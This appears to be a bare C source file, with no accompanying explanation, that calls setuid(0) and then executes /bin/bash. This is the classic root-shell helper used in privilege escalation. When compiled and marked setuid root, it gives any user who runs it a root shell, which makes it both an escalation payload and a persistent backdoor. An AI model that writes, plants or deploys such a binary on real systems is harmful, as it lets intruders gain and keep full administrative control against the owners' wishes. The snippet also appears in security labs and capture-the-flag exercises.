#include <stdio.h>
#include <unistd.h>

int
main()
{
	char *shell[2];
	shell[0] = "/bin/bash";
	shell[1] = NULL;

	setuid(0);

	execve (shell[0],shell,NULL);
}
